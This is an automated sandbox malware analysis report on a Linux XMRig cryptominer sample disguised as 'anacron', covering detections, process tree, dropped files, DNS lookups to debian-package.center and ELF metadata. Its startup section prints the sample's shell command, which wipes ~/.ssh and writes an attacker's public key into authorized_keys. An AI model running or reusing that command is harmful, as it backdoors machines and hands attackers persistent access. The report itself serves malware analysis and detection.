Automated Malware Analysis Report for Anacron

ID: 202040 Sample Name: anacron Cookbook: defaultlinuxfilecookbook.jbs Time: 02:46:46 Date: 20/01/2020 Version: 28.0.0 Lapis Lazuli Table of Contents

Table of Contents 2 Analysis Report anacron 5 Overview 5 General Information 5 Detection 5 Classification 5 Mitre Att&ck Matrix 6 Signature Overview 7 AV Detection: 7 Bitcoin Miner: 7 Networking: 7 System Summary: 7 Persistence and Installation Behavior: 7 Malware Analysis System Evasion: 7 Malware Configuration 8 Runtime Messages 8 Behavior Graph 8 Yara Overview 8 Initial Sample 8 PCAP (Network Traffic) 9 Dropped Files 9 Sigma Overview 9 Joe Sandbox View / Context 9 IPs 9 Domains 9 ASN 9 JA3 Fingerprints 10 Dropped Files 10 Antivirus, Machine Learning and Genetic Malware Detection 10 Initial Sample 10 Dropped Files 10 Domains 10 URLs 10 Startup 10 Created / dropped Files 11 Domains and IPs 12 Contacted Domains 12 URLs from Memory and Binaries 12 Contacted IPs 12 Public 13 Static File Info 13 General 13 Static ELF Info 13 ELF header 13 Sections 14 Program Segments 14 Dynamic Tags 14 Symbols 15 Network Behavior 15 Network Port Distribution 15 TCP Packets 15 UDP Packets 15 DNS Queries 15 DNS Answers 15 System Behavior 16 Analysis Process: anacron PID: 20758 Parent PID: 20706 16 General 16 File Activities 16 File Read 16 Copyright Joe Security LLC 2020 Page 2 of 23 Directory Enumerated 16 Analysis Process: anacron PID: 20759 Parent PID: 20758 16 General 16 Analysis Process: sh PID: 20759 Parent PID: 20758 16 General 16 File Activities 17 File Read 17 File Written 17 Analysis Process: sh PID: 20761 Parent PID: 20759 17 General 17 Analysis Process: rm PID: 20761 Parent PID: 20759 17 General 17 File Activities 17 File Deleted 17 File Read 17 Analysis Process: sh PID: 20764 Parent PID: 20759 17 General 17 Analysis Process: mkdir PID: 20764 Parent PID: 20759 17 General 18 File Activities 18 File Read 18 Directory Created 18 Analysis Process: sh PID: 20771 Parent PID: 20759 18 General 18 Analysis Process: chmod PID: 20771 Parent PID: 20759 18 General 18 File Activities 18 File Read 18 Directory Enumerated 18 Permission Modified 18 Analysis Process: anacron PID: 20780 Parent PID: 20758 18 General 18 File Activities 18 File Read 19 File Written 19 Analysis Process: upstart PID: 20811 Parent PID: 20139 19 General 19 Analysis Process: sh PID: 20811 Parent PID: 20139 19 General 19 File Activities 19 File Read 19 Analysis Process: sh PID: 20812 Parent PID: 20811 19 General 19 Analysis Process: date PID: 20812 Parent PID: 20811 19 General 19 File Activities 19 File Read 20 Analysis Process: sh PID: 20813 Parent PID: 20811 20 General 20 Analysis Process: apport-checkreports PID: 20813 Parent PID: 20811 20 General 20 File Activities 20 File Read 20 File Written 20 Directory Enumerated 20 Analysis Process: upstart PID: 20838 Parent PID: 20139 20 General 20 Analysis Process: sh PID: 20838 Parent PID: 20139 20 General 20 File Activities 21 File Read 21 Analysis Process: sh PID: 20839 Parent PID: 20838 21 General 21 Analysis Process: date PID: 20839 Parent PID: 20838 21 General 21 File Activities 21 File Read 21 Analysis Process: sh PID: 20855 Parent PID: 20838 21 General 21 Analysis Process: apport-gtk PID: 20855 Parent PID: 20838 21 General 21 File Activities 21 File Read 22 File Written 22

Copyright Joe Security LLC 2020 Page 3 of 23 Directory Enumerated 22 Analysis Process: upstart PID: 20868 Parent PID: 20139 22 General 22 Analysis Process: sh PID: 20868 Parent PID: 20139 22 General 22 File Activities 22 File Read 22 Analysis Process: sh PID: 20869 Parent PID: 20868 22 General 22 Analysis Process: date PID: 20869 Parent PID: 20868 22 General 22 File Activities 23 File Read 23 Analysis Process: sh PID: 20870 Parent PID: 20868 23 General 23 Analysis Process: apport-gtk PID: 20870 Parent PID: 20868 23 General 23 File Activities 23 File Read 23 Directory Enumerated 23

Overview

General Information

Joe Sandbox Version: 28.0.0 Lapis Lazuli Analysis ID: 202040 Start date: 20.01.2020 Start time: 02:46:46 Joe Sandbox Product: CloudBasic Overall analysis duration: 0h 3m 59s Hypervisor based Inspection enabled: false Report type: light Sample file name: anacron Cookbook file name: defaultlinuxfilecookbook.jbs Analysis system description: Ubuntu Linux 16.04 x64 (Kernel 4.4.0-116, Firefox 59.0, Document Viewer 3.18.2, LibreOffice 5.1.6.2, OpenJDK 1.8.0_171) Detection: MAL Classification: mal76.troj.mine.lin@0/4@4/0 Warnings: Show All

Detection

Strategy Score Range Reporting Whitelisted Threat Detection

Xmrig Threshold 76 0 - 100 false

Classification

Miner Spreading

mmaallliiiccciiioouusss

malicious

Evader Phishing

sssuusssppiiiccciiioouusss

suspicious

cccllleeaann

clean

Exploiter Banker

Spyware Trojan / Bot

Adware

Mitre Att&ck Matrix

Remote Initial Privilege Defense Credential Lateral Command Network Service Access Execution Persistence Escalation Evasion Access Discovery Movement Collection Exfiltration and Control Effects Effects Valid Command-Line Hidden Files Port Hidden Files Credential Security Application Data from Data Standard Non- Eavesdrop on Remotely Accounts Interface 1 and Monitors and Dumping Software Deployment Local Compressed Application Insecure Track Device Directories 1 Directories 1 Discovery 1 Software System Layer Network Without Protocol 1 Communication Authorization Replication Scripting 1 Port Monitors Accessibility File and Network File and Remote Data from Exfiltration Standard Exploit SS7 to Remotely Through Features Directory Sniffing Directory Services Removable Over Other Application Redirect Phone Wipe Data Removable Permissions Discovery 1 Media Network Layer Calls/SMS Without Media Modification 1 Medium Protocol 1 Authorization External Windows Accessibility Path Scripting 1 Input System Windows Data from Automated Custom Exploit SS7 to Obtain Remote Management Features Interception Capture Information Remote Network Exfiltration Cryptographic Track Device Device Services Instrumentation Discovery 3 Management Shared Protocol Location Cloud Drive Backups Drive-by Scheduled System DLL Search File Credentials System Logon Input Data Multiband SIM Card Compromise Task Firmware Order Deletion 1 in Files Network Scripts Capture Encrypted Communication Swap Hijacking Configuration Discovery

• AV Detection • Bitcoin Miner • Networking • System Summary • Persistence and Installation Behavior • Malware Analysis System Evasion

Click to jump to signature section

AV Detection:

Antivirus detection for sample

Multi AV Scanner detection for submitted file

Bitcoin Miner:

Yara detected Xmrig cryptocurrency miner

Detected Stratum mining protocol

Found strings related to Crypto-Mining

Reads CPU information from /proc indicative of miner or evasive malware

Reads CPU information from /sys indicative of miner or evasive malware

Networking:

Performs DNS lookups

Urls found in memory or binary data

System Summary:

Sample contains strings that are potentially command strings

Sample has stripped symbol table

Classification label

Persistence and Installation Behavior:

Sample reads /proc/mounts (often used for finding a writable filesystem)

Counts the number of processes currently running

Creates hidden files and/or directories

Executes commands using a shell command-line interpreter

Executes the "chmod" command used to modify permissions

Executes the "mkdir" command used to create folders

Executes the "rm" command used to delete files or directories

Reads system information from the proc file system

Sample tries to set the executable flag

Malware Analysis System Evasion:

Reads CPU information from /proc indicative of miner or evasive malware Copyright Joe Security LLC 2020 Page 7 of 23 Reads CPU information from /sys indicative of miner or evasive malware

Uses the "uname" system call to query kernel version information (possible evasion)

Malware Configuration

No configs have been found

Runtime Messages

Command: /tmp/anacron Exit Code: 0 Exit Code Info: Killed: False Standard Output: [2020-01-20 03:47:29.290] unable to open '/tmp/config.json'. Standard Error:

Behavior Graph

Hide Legend Legend: Process Signature

Behavior Graph Created File ID: 202040 DNS/IP Info Sample: anacron Startdate: 20/01/2020 Architecture: LINUX Is Dropped Score: 76 Number of created Files

Is malicious 45.9.148.125, 45164, 80 unknown debian-package.center Internet Netherlands

started started started started

Antivirus detection Multi AV Scanner detection Yara detected Xmrig 2 other signatures for sample for submitted file cryptocurrency miner

upstart upstart upstart anacron sh sh sh

Sample reads /proc/mounts (often used for finding started started started started started started started started a writable filesystem)

anacron sh sh sh sh sh sh anacron sh date apport-checkreports date apport-gtk date apport-gtk

started started started

sh sh sh rm mkdir chmod

Yara Overview

Initial Sample

Source Rule Description Author Strings

Copyright Joe Security LLC 2020 Page 8 of 23 Source Rule Description Author Strings anacron JoeSecurity_Xmrig Yara detected Joe Security Xmrig cryptocurrency miner

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Sigma Overview

No Sigma rule has matched

Joe Sandbox View / Context

IPs

Match Associated Sample Name / URL SHA 256 Detection Link Context 45.9.148.125 cron Get hash malicious Browse cQLmNrun Get hash malicious Browse

Domains

Match Associated Sample Name / URL SHA 256 Detection Link Context debian-package.center cron Get hash malicious Browse 45.9.148.129 cron Get hash malicious Browse 45.9.148.129

ASN

Match Associated Sample Name / URL SHA 256 Detection Link Context unknown testfile Get hash malicious Browse 91.189.92.20 Launcher.apk Get hash malicious Browse 216.58.201.99 5.45.79.15/input/?mark=20200116- Get hash malicious Browse 185.211.246.22 wentontravel.com/cuz&tpl=XXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX&engke y=delonghi%20portafilter%20size 5.45.79.15/input/?mark=20200116- Get hash malicious Browse 185.211.246.22 wentontravel.com/cuz&tpl=XXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX&engke y=delonghi portafilter size Project2.doc Get hash malicious Browse 51.15.6.128 https://top4top.io/downloadf-11687unj01-rar.html Get hash malicious Browse 54.38.152.27 www.ltyuye.com/wp-admin/rrktd1y-1v-75/ Get hash malicious Browse 23.235.217.105 txfc58.com/wordpress/m2utbn-3ft4c-07947/ Get hash malicious Browse 185.216.11 3.122 instructions 01 18 2020.doc Get hash malicious Browse 23.235.217.105 instructions 01 18 2020.doc Get hash malicious Browse 217.160.5.123 PO987889-JAN-20-20-Order_Quote,pdf.exe Get hash malicious Browse 172.217.23.193 koadic_test_online_9997_rundll.vbs Get hash malicious Browse 79.137.36.9 www.searchnewtabs.com/download Get hash malicious Browse 52.206.61.22 91.92.66.124/..j/ Get hash malicious Browse 91.92.66.124 https://gcc01.safelinks.protection.outlook.com/? Get hash malicious Browse 209.197.3.24 url=https%3A%2F%2Fsway.office.com%2FUN0jHy70XUb7BI Xa%3Fref%3DLink&data=02%7C01%7Cjh.jackson%40trade.g ov%7Cc3e4a0c456a7407e91f408d79a641704%7Ca1d183f26c 7b4d9ab9945f2f31b3f780%7C1%7C1%7C6371476269863866 89&sdata=AhWGM0VN8KygMfO7X6%2FHVaDVvk7tiKzPkuC oZ%2FooVfs%3D&reserved=0 Copyright Joe Security LLC 2020 Page 9 of 23 Match Associated Sample Name / URL SHA 256 Detection Link Context 95.179.163.186 Get hash malicious Browse 95.179.163.186 https://perfecttux.com Get hash malicious Browse 147.75.84.39 INVOICE FAF3766_778982019.doc Get hash malicious Browse 185.216.11 3.122 INVOICE FAF3766_778982019.doc Get hash malicious Browse 217.160.5.123 FileZilla_3.46.3_win64_sponsored-setup.exe Get hash malicious Browse 5.62.44.224

JA3 Fingerprints

No context

Dropped Files

No context

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source Detection Scanner Label Link anacron 40% Virustotal Browse anacron 100% Avira LINUX/BitCoinMiner.hglyx

Dropped Files

No Antivirus matches

Domains

Source Detection Scanner Label Link debian-package.center 0% Virustotal Browse

URLs

Source Detection Scanner Label Link https://xmrig.com/docs/algorithms 0% Virustotal Browse https://xmrig.com/docs/algorithms 0% Avira URL Cloud safe

Startup

Copyright Joe Security LLC 2020 Page 10 of 23 system is lnxubuntu1 anacron (PID: 20758, Parent: 20706, MD5: 8d5d71c56b1f807edac5ac734feab41a) Arguments: /tmp/anacron anacron New Fork (PID: 20759, Parent: 20758) sh (PID: 20759, Parent: 20758, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9Eu WOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGP K5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~" sh New Fork (PID: 20761, Parent: 20759) rm (PID: 20761, Parent: 20759, MD5: b79876063d894c449856cca508ecca7f) Arguments: rm -rf .ssh sh New Fork (PID: 20764, Parent: 20759) mkdir (PID: 20764, Parent: 20759, MD5: a97f666f21c85ec62ea47d022263ef41) Arguments: mkdir .ssh sh New Fork (PID: 20771, Parent: 20759) chmod (PID: 20771, Parent: 20759, MD5: 32c8c7318223ebc5b934a78cfc153d6f) Arguments: chmod -R go= /home/user/.ssh anacron New Fork (PID: 20780, Parent: 20758) upstart New Fork (PID: 20811, Parent: 20139) sh (PID: 20811, Parent: 20139, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -e /proc/self/fd/9 sh New Fork (PID: 20812, Parent: 20811) date (PID: 20812, Parent: 20811, MD5: 54903b613f9019bfca9f5d28a4fff34e) Arguments: date sh New Fork (PID: 20813, Parent: 20811) apport-checkreports (PID: 20813, Parent: 20811, MD5: 1a7d84ebc34df04e55ca3723541f48c9) Arguments: /usr/bin/python3 /usr/share/apport/apport-checkreports --system upstart New Fork (PID: 20838, Parent: 20139) sh (PID: 20838, Parent: 20139, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -e /proc/self/fd/9 sh New Fork (PID: 20839, Parent: 20838) date (PID: 20839, Parent: 20838, MD5: 54903b613f9019bfca9f5d28a4fff34e) Arguments: date sh New Fork (PID: 20855, Parent: 20838) apport-gtk (PID: 20855, Parent: 20838, MD5: ec58a49a30ef6a29406a204f28cc7d87) Arguments: /usr/bin/python3 /usr/share/apport/apport-gtk upstart New Fork (PID: 20868, Parent: 20139) sh (PID: 20868, Parent: 20139, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -e /proc/self/fd/9 sh New Fork (PID: 20869, Parent: 20868) date (PID: 20869, Parent: 20868, MD5: 54903b613f9019bfca9f5d28a4fff34e) Arguments: date sh New Fork (PID: 20870, Parent: 20868) apport-gtk (PID: 20870, Parent: 20868, MD5: ec58a49a30ef6a29406a204f28cc7d87) Arguments: /usr/bin/python3 /usr/share/apport/apport-gtk cleanup

Created / dropped Files

/home/user/.ssh/authorized_keys Process: /bin/sh File Type: OpenSSH RSA public key Size (bytes): 389 Entropy (8bit): 5.91239652812259 Encrypted: false MD5: A420F7A60A40F3FF3A806A01FEB1DFDA SHA1: 1AE65132B036DE51BCC62F66B51AE362E11182AF SHA-256: A8460F446BE540410004B1A8DB4083773FA46F7FE76FA84219C93DAA1669F8F2 SHA-512: 1BA854C321D89441291DA2638D65748FFA06923A63FD2BB9BE8A66440236503FB34E375726A8DA679B55CED51DDA82293FFCFB8BB76563E2DA0071222D3247BF Malicious: false Reputation: low Preview: ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1R V/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQH md1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySV KPRK+oRw== mdrfckr.

/sys/devices/system/node/node0/hugepages/hugepages-2048kB/nr_hugepages Process: /tmp/anacron File Type: ASCII text, with no line terminators Size (bytes): 6 Entropy (8bit): 1.9182958340544893 Encrypted: false MD5: 1054DD099E3998ACB4C217F5AE41D8C8 SHA1: 9F649342B81C46321145FB8F13EDD0F61487F1B4 SHA-256: 498A8E5240652961A0C8BCE6BBAB33A705253FF3B4E81403E5CFE3B779263A5A SHA-512: 03070B43582647A6344B3FFB462DFB4F77814D6ABB77E162A42486B07A13CF0AEBAEB1F2E25003C104808AB9D7ECF6E70EC686C9078F7183BA3E2823216EF4B7 Malicious: false Reputation: low Preview: 128129

/var/crash/_usr_share_apport_apport-checkreports.1000.crash Process: /usr/share/apport/apport-checkreports File Type: ASCII text

Copyright Joe Security LLC 2020 Page 11 of 23 /var/crash/_usr_share_apport_apport-checkreports.1000.crash Size (bytes): 14923 Entropy (8bit): 4.684369237174026 Encrypted: false MD5: 62591DEB2982540970B8033F260B349B SHA1: 72631B02B97594A7D1B83641B26C85105E8B62B1 SHA-256: 931DAED4EDA2C49315FF866273E17758D9420E899244DB2A48043DCC5B12340C SHA-512: 6F9D6266231081B1FB32A845D22B0CC02F1C7E2EB4FA6CAAA7A8F309E44B44C181BE8CD17D0CC2568E3F69CA88D78ECE3E296A830A289058FA53F6DBC3F5CA 08 Malicious: false Reputation: low Preview: ProblemType: Crash.Date: Mon Jan 20 03:47:31 2020.ExecutablePath: /usr/share/apport/apport-checkreports.ExecutableTimestamp: 1514927430.InterpreterPath: /usr/bi n/python3.5.ProcCmdline: /usr/bin/python3 /usr/share/apport/apport-checkreports --system.ProcCwd: /home/user.ProcEnviron:. LANGUAGE=en_US. PATH=(custom, user). XDG_RUNTIME_DIR=. LANG=en_US.UTF-8. SHELL=/bin/bash.ProcMaps:. 00400000-007a9000 r-xp 00000000 fc:00 217 /usr/bin/ python3.5. 009a9000-009ab000 r--p 003a9000 fc:00 217 /usr/bin/python3.5. 009ab000-00a42000 rw-p 003ab000 fc:00 217 /us r/bin/python3.5. 00a42000-00a73000 rw-p 00000000 00:00 0 . 010f8000-0144f000 rw-p 00000000 00:00 0 [heap]. 7f7df59ef000-7f7df5b70000 rw-p 00000000 00:00 0 . 7f7df5b70000-7f7df5b87000 r-xp 00000000 fc:00 2382 /usr/lib/x86_64-linux-gnu/liblz4.so.1.7.1. 7f7df5b87000-7f7df5d86000 ---p 000 17000 fc:0

/var/crash/_usr_share_apport_apport-gtk.1000.crash Process: /usr/share/apport/apport-gtk File Type: ASCII text Size (bytes): 47102 Entropy (8bit): 4.494867931830367 Encrypted: false MD5: 4949187FF25EB31488F0D5DB591FAD08 SHA1: 64D7171189CCE702169C62C441D063C953C86F6A SHA-256: 8B3DAFECEC14F6BDD7FE2AA80C019F0DB3590D487D8E0FAC63B89E4F09C96032 SHA-512: B29F2FB2E025C128A680A9A68F00D0CDDF3AAA971CD2928705BD876F8AD0194E40CE709B426874D8C4618430C90B46B0F4A1579BC3C090CB236EE272AB0B6794 Malicious: false Reputation: low Preview: ProblemType: Crash.Date: Mon Jan 20 03:47:31 2020.ExecutablePath: /usr/share/apport/apport-gtk.ExecutableTimestamp: 1514927430.InterpreterPath: /usr/bin/python3 .5.ProcCmdline: /usr/bin/python3 /usr/share/apport/apport-gtk.ProcCwd: /home/user.ProcEnviron:. LANGUAGE=en_US. PATH=(custom, user). XDG_RUNTIME_DIR=< set>. LANG=en_US.UTF-8. SHELL=/bin/bash.ProcMaps:. 00400000-007a9000 r-xp 00000000 fc:00 217 /usr/bin/python3.5. 009a9000-009ab000 r--p 003a9000 fc:00 217 /usr/bin/python3.5. 009ab000-00a42000 rw-p 003ab000 fc:00 217 /usr/bin/python3.5. 00a42000-00a73000 rw-p 00000000 00:00 0 . 01522000-01a45000 rw-p 00000000 00:00 0 [heap]. 7ff67717d000-7ff67727d000 rw-p 00000000 00:00 0 . 7ff67727d000- 7ff677294000 r-xp 00000000 fc:00 2382 /usr/lib/x86_64-linux-gnu/liblz4.so.1.7.1. 7ff677294000-7ff677493000 ---p 00017000 fc:00 2382

Domains and IPs

Contacted Domains

Name IP Active Malicious Antivirus Detection Reputation debian-package.center 45.9.148.117 true false 0%, Virustotal, Browse unknown

URLs from Memory and Binaries

Contacted IPs

50% < No. of IPs < 75% 75% < No. of IPs

Public

IP Country Flag ASN ASN Name Malicious 45.9.148.125 Netherlands 49447 unknown true

Static File Info

General File type: ELF 32-bit LSB shared object, Intel 80386, version 1 (SYSV), dynamically linked, stripped Entropy (8bit): 6.550050885060555 TrID: ELF Executable and Linkable format (generic) (4004/1) 100.00% File name: anacron File size: 2902776 MD5: 8d5d71c56b1f807edac5ac734feab41a SHA1: ca2064303d74f5fec98d717f35cd8ee20e81b722 SHA256: 49da718733de850ddd7e871fee1d2f041508d28b9cfc58a 822786151004a9c2c SHA512: 514337791f6c2b71e9303899a6206f92eb905c780729008 f3f754f256811332caa5d608662272a6eb3b1f3cf70d1ec5 28509bbe3f68c7960fc9df63c463fce3f SSDEEP: 49152:m7rTifP8qyUnJ1jIYuOwxC7mQ595+T91hGtZ1:Ir m38qyUnJ1jgx0B5evhG File Content Preview: .ELF...... 4...4....G,.....4. ...(...... pu..pu...... }.!.}.!...... ".. ".. "...... +...,...,. .T...... h<,.hL,.hL,...... +...,...,...... P.td0.#.0.#

Static ELF Info

ELF header Class: ELF32 Data: 2's complement, little endian Version: 1 (current) Machine: Intel 80386 Version Number: 0x1 Type: DYN (Shared object file)

Copyright Joe Security LLC 2020 Page 13 of 23 ELF header OS/ABI: UNIX - System V ABI Version: 0 Entry Point Address: 0xbf34 Flags: 0x0 ELF Header Size: 52 Program Header Offset: 52 Program Header Size: 32 Number of Program Headers: 9 Section Header Offset: 2901776 Section Header Size: 40 Number of Section Headers: 25 Header String Table Index: 24

Sections

Flags Name Type Address Offset Size EntSize Flags Description Link Info Align NULL 0x0 0x0 0x0 0x0 0x0 0 0 0 .gnu.hash GNU_HASH 0x154 0x154 0x18 0x4 0x2 A 2 0 4 .dynsym DYNSYM 0x16c 0x16c 0x10 0x10 0x2 A 3 1 4 .dynstr STRTAB 0x17c 0x17c 0x1 0x0 0x2 A 0 0 1 .rel.dyn REL 0x180 0x180 0x73f0 0x8 0x2 A 2 0 4 .init PROGBITS 0x8000 0x8000 0x11 0x0 0x6 AX 0 0 1 .plt PROGBITS 0x8020 0x8020 0x80 0x4 0x6 AX 0 0 16 .text PROGBITS 0x80a0 0x80a0 0x2194d1 0x0 0x6 AX 0 0 16 .fini PROGBITS 0x221571 0x221571 0xc 0x0 0x6 AX 0 0 1 .rodata PROGBITS 0x222000 0x222000 0x1c230 0x0 0x2 A 0 0 32 .eh_frame_hdr PROGBITS 0x23e230 0x23e230 0xbf7c 0x0 0x2 A 0 0 4 .eh_frame PROGBITS 0x24a1ac 0x24a1ac 0x6f068 0x0 0x2 A 0 0 4 .gcc_except_table PROGBITS 0x2b9214 0x2b9214 0x5ed1 0x0 0x2 A 0 0 4 .tbss NOBITS 0x2c020c 0x2bf20c 0x8 0x0 0x403 WAT 0 0 4 .init_array INIT_ARRAY 0x2c020c 0x2bf20c 0x78 0x4 0x3 WA 0 0 4 .fini_array FINI_ARRAY 0x2c0284 0x2bf284 0xc 0x4 0x3 WA 0 0 4 .ctors PROGBITS 0x2c0290 0x2bf290 0x8 0x0 0x3 WA 0 0 4 .dtors PROGBITS 0x2c0298 0x2bf298 0x8 0x0 0x3 WA 0 0 4 .data.rel.ro PROGBITS 0x2c02a0 0x2bf2a0 0x49c8 0x0 0x3 WA 0 0 32 .dynamic DYNAMIC 0x2c4c68 0x2c3c68 0xc8 0x8 0x3 WA 3 0 4 .got PROGBITS 0x2c4d30 0x2c3d30 0x2c4 0x4 0x3 WA 0 0 4 .data PROGBITS 0x2c5000 0x2c4000 0x624 0x0 0x3 WA 0 0 32 .bss NOBITS 0x2c5640 0x2c4624 0x9490 0x0 0x3 WA 0 0 64 .comment PROGBITS 0x0 0x2c4624 0x1a 0x1 0x30 MS 0 0 1 .shstrtab STRTAB 0x0 0x2c463e 0xd2 0x0 0x0 0 0 1

Program Segments

Physical Flags Type Offset Virtual Address Address File Size Memory Size Flags Description Align Prog Interpreter Section Mappings LOAD 0x0 0x0 0x0 0x7570 0x7570 0x4 R 0x1000 .gnu.hash .dynsym .dynstr .rel.dyn LOAD 0x8000 0x8000 0x8000 0x21957d 0x21957d 0x5 R E 0x1000 .init .plt .text .fini LOAD 0x222000 0x222000 0x222000 0x9d0e5 0x9d0e5 0x4 R 0x1000 .rodata .eh_frame_hdr .eh_frame .gcc_except_table LOAD 0x2bf20c 0x2c020c 0x2c020c 0x5418 0xe8c4 0x6 RW 0x1000 .init_array .fini_array .ctors .dtors .data.rel.ro .dynamic .got .data .bss DYNAMIC 0x2c3c68 0x2c4c68 0x2c4c68 0xc8 0xc8 0x6 RW 0x4 .dynamic TLS 0x2bf20c 0x2c020c 0x2c020c 0x0 0x8 0x4 R 0x4 GNU_EH_FRAME 0x23e230 0x23e230 0x23e230 0xbf7c 0xbf7c 0x4 R 0x4 .eh_frame_hdr GNU_STACK 0x0 0x0 0x0 0x0 0x0 0x6 RW 0x10 GNU_RELRO 0x2bf20c 0x2c020c 0x2c020c 0x4df4 0x4df4 0x4 R 0x1 .init_array .fini_array .ctors .dtors .data.rel.ro .dynamic .got

Dynamic Tags

Type Meta Value Tag DT_SYMBOLIC value 0x0 0x10 DT_INIT value 0x8000 0xc DT_FINI value 0x221571 0xd DT_INIT_ARRAY value 0x2c020c 0x19 Copyright Joe Security LLC 2020 Page 14 of 23 Type Meta Value Tag DT_INIT_ARRAYSZ bytes 120 0x1b DT_FINI_ARRAY value 0x2c0284 0x1a DT_FINI_ARRAYSZ bytes 12 0x1c DT_GNU_HASH value 0x154 0x6ffffef5 DT_STRTAB value 0x17c 0x5 DT_SYMTAB value 0x16c 0x6 DT_STRSZ bytes 1 0xa DT_SYMENT bytes 16 0xb DT_DEBUG value 0x0 0x15 DT_PLTGOT value 0x2c4d30 0x3 DT_REL value 0x180 0x11 DT_RELSZ bytes 29680 0x12 DT_RELENT bytes 8 0x13 DT_BIND_NOW value 0x0 0x18 DT_FLAGS_1 value 0x8000001 0x6ffffffb DT_RELCOUNT value 3710 0x6ffffffa DT_NULL value 0x0 0x0

Symbols

Version Info Version Info File Symbol Name Name Name Section Name Value Size Symbol Type Symbol Bind Visibility Ndx .dynsym 0x0 0 NOTYPE DEFAULT SHN_UNDEF

Network Behavior

Network Port Distribution

Total Packets: 12 • 53 (DNS) • 80 (HTTP)

TCP Packets

UDP Packets

DNS Queries

Timestamp Source IP Dest IP Trans ID OP Code Name Type Class Jan 20, 2020 02:47:30.142142057 CET 192.168.2.20 8.8.8.8 0xc389 Standard query debian-pac A (IP address) IN (0x0001) (0) kage.center Jan 20, 2020 02:47:30.142239094 CET 192.168.2.20 8.8.4.4 0xc389 Standard query debian-pac A (IP address) IN (0x0001) (0) kage.center Jan 20, 2020 02:47:30.142302990 CET 192.168.2.20 8.8.8.8 0xd8bc Standard query debian-pac 28 IN (0x0001) (0) kage.center Jan 20, 2020 02:47:30.142364979 CET 192.168.2.20 8.8.4.4 0xd8bc Standard query debian-pac 28 IN (0x0001) (0) kage.center

DNS Answers

Copyright Joe Security LLC 2020 Page 15 of 23 Timestamp Source IP Dest IP Trans ID Reply Code Name CName Address Type Class Jan 20, 2020 8.8.8.8 192.168.2.20 0xc389 No error (0) debian-pac 45.9.148.117 A (IP address) IN (0x0001) 02:47:30.167655945 kage.center CET Jan 20, 2020 8.8.8.8 192.168.2.20 0xc389 No error (0) debian-pac 45.9.148.129 A (IP address) IN (0x0001) 02:47:30.167655945 kage.center CET Jan 20, 2020 8.8.8.8 192.168.2.20 0xc389 No error (0) debian-pac 45.9.148.125 A (IP address) IN (0x0001) 02:47:30.167655945 kage.center CET Jan 20, 2020 8.8.4.4 192.168.2.20 0xc389 No error (0) debian-pac 45.9.148.125 A (IP address) IN (0x0001) 02:47:30.167726040 kage.center CET Jan 20, 2020 8.8.4.4 192.168.2.20 0xc389 No error (0) debian-pac 45.9.148.117 A (IP address) IN (0x0001) 02:47:30.167726040 kage.center CET Jan 20, 2020 8.8.4.4 192.168.2.20 0xc389 No error (0) debian-pac 45.9.148.129 A (IP address) IN (0x0001) 02:47:30.167726040 kage.center CET

System Behavior

Analysis Process: anacron PID: 20758 Parent PID: 20706

General

Start time: 02:47:29 Start date: 20/01/2020 Path: /tmp/anacron Arguments: /tmp/anacron File size: 2902776 bytes MD5 hash: 8d5d71c56b1f807edac5ac734feab41a

File Activities

File Read

Directory Enumerated

Analysis Process: anacron PID: 20759 Parent PID: 20758

General

Start time: 02:47:29 Start date: 20/01/2020 Path: /tmp/anacron Arguments: n/a File size: 2902776 bytes MD5 hash: 8d5d71c56b1f807edac5ac734feab41a

Analysis Process: sh PID: 20759 Parent PID: 20758

General

Start time: 02:47:29 Start date: 20/01/2020 Path: /bin/sh

